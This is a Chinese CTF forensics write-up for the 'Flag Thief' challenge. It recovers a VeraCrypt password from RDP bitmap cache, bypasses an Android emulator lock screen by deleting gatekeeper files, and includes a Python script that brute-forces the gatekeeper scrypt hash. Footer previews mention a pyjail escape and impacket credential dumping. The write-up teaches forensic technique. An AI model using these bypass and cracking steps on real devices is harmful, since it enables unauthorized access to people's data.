Drive the 7z's passowrd is ec19b53ce10adc41be119713ffe34760 Flag Thief hint1:经过警方长达一天的审讯,L1near交代他曾经对受害人的电脑远程操控过 ``` 通过 hint 注意到远程连接的bmc位图缓存,路径如下: ![bmc位图缓存地址路径](https://i.imgur.com/lQ6NqNF.png) 利用`bmc-tools`恢复缓存的 bmc 位图,通过大概浏览可以得到其中存在记事本的界面,里面包含着 veracrypt 的字样,那么将其拼接得到: ![](https://i.imgur.com/H44gBCy.png) ``` VeraCrypt 5eCuri7yPaSsW0rd@__WMCTF Oh no! U found it! ``` 那么就需要找到能让我们解密的 veracrypt 容器,这里通过取证大师的加密文件分类定位到一个可疑的文件: ![](https://i.imgur.com/wedFU0E.png) 将其利用之前得到的秘钥挂载得到`nox-disk2.vmdk`,通过名称可以得知是夜神模拟器的数据盘,将其挂载在模拟器中即可打开,发现存在锁屏密码: ![](https://i.imgur.com/wO9ptGw.png) 这里通过删除vmdk中的 gatekeeper.pattern.key gatekeeper.password.key 以及 device_policies.xml 文件可以绕过锁屏直接进入,查看通讯录发现: ![](https://i.imgur.com/Ajd2KjA.png) ![](https://i.imgur.com/vTQ8Yat.png) 可恶还是需要锁屏密码,非预期方法被防了 :sob: :sob: 那么我们再来看锁屏密码,这里参考中科实数杯的考点: https://mp.weixin.qq.com/s?__biz=MzAxODA3NDc3NA==&mid=2247484582&idx=1&sn=716471f5440de7305ae1a8075e5c7bf9 X-ways先提取`/system/device_policies.xml`以确认密码为9位: ![](https://i.imgur.com/D6Yo8Hd.png) ![](https://i.imgur.com/OXbRSdj.png) 然后提取 gatekeeper.pattern.key ,计算哈希并爆破密码,那么我们首先生成字典(9位不重复数字): ```python # python3 file1 = open('password.txt', 'a') for a in "123456789": for b in "123456789": for c in "123456789": for d in "123456789": for e in "123456789": for f in "123456789": for g in "123456789": for h in "123456789": for i in "123456789": if a != b and a != c and a != d and a != e and a != f and a != g and a != h and a != i \ and b != c and b != d and b != e and b != f and b != g and b != h and b != i \ and c != d and c != e and c != f and c != g and c != h and c != i\ and d != e and d != f and d != g and d != h and d != i\ and e != f and e != g and e != h and e != i\ and f != g and f != h and f != i\ and g != h and g != i\ and h != i: password = a + b + c + d + e + f + g + h + i file1.write(password + '\n') file1.close() ``` 爆破脚本: ```python import struct import binascii import scrypt N = 16384 r = 8 p = 1 f = open('gatekeeper.pattern.key', 'rb') blob = f.read() s = struct.Struct('<' + '17s 8s 32s') (meta, salt, signature) = s.unpack_from(blob) f1 = open('password.txt', 'rb') lines = f1.readlines() for i in range(len(lines)): password = lines[i][:-2] to_hash = meta to_hash += password hash = scrypt.hash(to_hash, salt, N, r, p) print('password: %s' % password) print('signature: %s' % binascii.hexlify(signature)) print('Hash: %s' % binascii.hexlify(hash[0:32])) print('Equal: %s' % (hash[0:32] == signature)) if hash[0:32] == signature: print("OK") exit() ``` 得到密码: ``` password: 183492765 signature fc677bebe8884278575c19a79a7f0efbab47f2e4dd73d43564adc17373fea9e7 Hash: fc677bebe8884278575c19a79a7f0efbab47f2e4dd73d43564adc17373fea9e7 Equal: True OK ``` 锁屏验证后发现可以解开 (当然上述的部分也可以使用hashcat进行爆破,速度应该比这个脚本要快上不少) 那么猜测接下来的过程是利用解得的锁屏作为密钥来解密文: ``` cipher: BS7nX1uw+KmS4LSXlK3LIntByEturqY4qjGI/yj3Di8aps4K+DR9hCzndjUD7w54 key: 183492765 ``` AES 解密 http://tool.chacuo.net/cryptaes ![](https://i.imgur.com/HFyjTYM.png) flag: ``` wmctf{dc4fc81e0aedc4692a7e312ce503e3ef} ```
Last changed by  
crazyman
r3kapig摸鱼划水人 平常喜欢做做misc以及取证类题目 现在在学习逆向和pwn 密码等方向 比较菜 呜呜呜呜
1091

Read more

西湖论剑-Isolated Machine Memory Analysis Writeup

本文赛后与zysgmzb共同完成 Isolated Machine Memory Analysis: 题目名称: Isolated Machine Memory Analysis 题目内容: 张三,现用名叫Charlie,在一家外企工作,负责flag加密技术的研究。为了避免flag泄露,这家企业制定了严格的安全策略,严禁flag离开研发服务器,登录服务器必须经过跳板机。张三使用的跳板机是一台虚拟机,虽然被全盘加密没法提取,但好消息是至少还没关机。 免责声明:本题涉及的人名、单位名、产品名、域名及IP地址等均为虚构,如有雷同纯属巧合。 注:本题模拟真实研发环境,解题有关的信息不会出现在人名、域名或IP地址等不合常理的地方。链接:https://pan.baidu.com/s/1WESej-pyjWKZni7drZGTig?pwd=cq46 提取码:cq46 题目难度:

3/1/2023
Insomni'hack teaser 2023 - Autopsy:

In the Lunar New Year, I played Insomni'hack teaser 2023, one of the topics labeled forensics, realistic, windows aroused my interest, I solved him. And I learned some knowledge from it. This is the record writeup Autopsy: Wireshark loads through the export object and selects http, save all and then filters to get three files SYSTEM, SECURITY, ntds.dit Then after searching, you can learn some relevant content about credential extraction https://github.com/SecureAuthCorp/impacket Through some things made by secretdump.py, it seems that it is not very useful. But it may be used to extract the key to decrypt the traffic

1/23/2023
idek 2022* CTF Pyjail && Pyjail Revenge Writeup

Pyjail: The code looks like this blocklist = ['.', '\\', '[', ']', '{', '}',':'] DISABLE_FUNCTIONS = ["getattr", "eval", "exec", "breakpoint", "lambda", "help"] DISABLE_FUNCTIONS = {func: None for func in DISABLE_FUNCTIONS} There is a blocklist ban off '.' , '\\', '[', ']', '{', '}', ':'. Then there is a DISABLE_FUNCTIONS that registers None objects for 'getattr', 'eval', 'exec', 'breakpoint', 'lambda', 'help' and overrides the corresponding functions in __builtins__. Also, the file name is jail.py, and the one in docker is also jail, so you can use __import__('jail'), but you may have to type it twice, so it's better to use __import__(__main__). Also flag sets permission not to read directly and then gives a readflag, called with the argument /readflag giveflag Also, this question can be executed in multiple lines, so you can do something like emptying the blocklist as follows

1/18/2023
idek CTF 2022* Forensics - HiddenGem Mixtape Writeup

This week is the Preliminary Eve in China, and most of my time is resting and partying. At the same time, there are some good challenges in idek CTF, among which I prefer the HiddenGem Mixtape series of challenges. Since I am a forensics enthusiast, and I I am also a malware analyst. So I prefer this challenge that is close to the realworld. Although some people may feel that this challenge is strange,guessing. Including some designs that may confuse the players. I hope my writeup can let you learn more much.Let's gooooo And a digression: szymex73 so strong! █Bquanman█ so strong! HiddenGem Mixtape: After downloading the file, we got three files 2023-01-07T194857_HiddenGem.zip,Note.txt,HiddenGem.7z 2023-01-07T194857_HiddenGem.zip after decompression is 2023-01-07T194857_HiddenGem.vhdx Note.txt:

1/16/2023
Read more from crazyman
Published on HackMD